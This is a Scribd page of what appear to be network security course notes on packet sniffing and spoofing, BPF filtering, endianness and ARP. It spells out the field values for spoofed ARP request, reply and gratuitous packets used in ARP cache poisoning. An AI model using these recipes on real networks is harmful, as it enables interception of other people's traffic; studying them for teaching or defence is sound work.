Scribd
Upload
39 views

Sniff/spoof: BPF Syntax

This document discusses sniffing and spoofing network packets. It explains that promiscuous mode allows a NIC to see all network traffic while monitor mode is used for wireless NICs. Packet filtering is done using BSD Packet Filter in the kernel. Sniffing tools include raw sockets, pcap and scapy while spoofing uses raw sockets and scapy. The document also covers endianness and Address Resolution Protocol (ARP) which maps IP addresses to MAC addresses on a local network. ARP cache poisoning can be done using spoofed ARP requests, replies or gratuitous messages to associate another device's IP with the attacker's MAC address.

Uploaded by

simon sylvester
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
39 views

Sniff/spoof: BPF Syntax

This document discusses sniffing and spoofing network packets. It explains that promiscuous mode allows a NIC to see all network traffic while monitor mode is used for wireless NICs. Packet filtering is done using BSD Packet Filter in the kernel. Sniffing tools include raw sockets, pcap and scapy while spoofing uses raw sockets and scapy. The document also covers endianness and Address Resolution Protocol (ARP) which maps IP addresses to MAC addresses on a local network. ARP cache poisoning can be done using spoofed ARP requests, replies or gratuitous messages to associate another device's IP with the attacker's MAC address.

Uploaded by

simon sylvester
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 3

Sniff/spoof

 Promiscuous mode: NIC passes every frame to the kernel. Usually frames that have
matching MAC address are passed to the kernel. Other packets will be dropped by
hardware.
 Monitor mode: the “promiscuous mode” for wireless NICs. Because wireless
transmission works on different channels, this requires special hardware. Sometimes it is
impossible to capture all traffic in the physical world.
 BSD Packet Filter (BPF)
o A filtering mechanism implemented inside the kernel.
o We need to implement this filter in kernel space because it is costly to pass them
from kernel to user space.
o BPF Syntax
 Packet sniffing/spoofing
o Sniff: raw socket, pcap, scapy
o Spoof: raw socket, scapy
 Endianness
o Big endian: most significant byte first (e.g. Network, IBM PowerPC)
o Small endian: least significant byte first (e.g. x86, Qualcomm Hexagon)
ARP: Address Resolution Protocol
 Purpose of ARP protocol: find the corresponding MAC address of an IP address inside a
local network.
 Three ways to conduct ARP cache poisoning
o Identities: M (attacker), A (victim), B
o Goal: on machine A, B’s IP address is associated with M’s MAC address.
o Using ARP request
 Spoof a tampered request on behalf of B to A (as if B is requesting A’s
MAC address)
 ARP request
 OPER=1
 SHA=M's MAC
 SPA=B's IP
 TPA=A's IP
o Using ARP reply
 ARP reply (as if B is replying A’s ARP request)
 OPER=2
 SHA=M's MAC
 SPA=B's IP
 THA=A's MAC
 TPA=A's IP
o Using ARP gratuitous message
 Gratuitous message: a broadcast ARP message informing address changes
to the entire network.
 Characteristics: OPER=1, SPA=TPA, THA=BROADCAST
 ARP packet
 OPER=1
 SHA=M's MAC
 SPA=B's IP
 THA=BROADCAST
 TPA=B's IP
 We cannot use ARP to attack remote computers because ARP packets will not be routed
on the Internet.

You might also like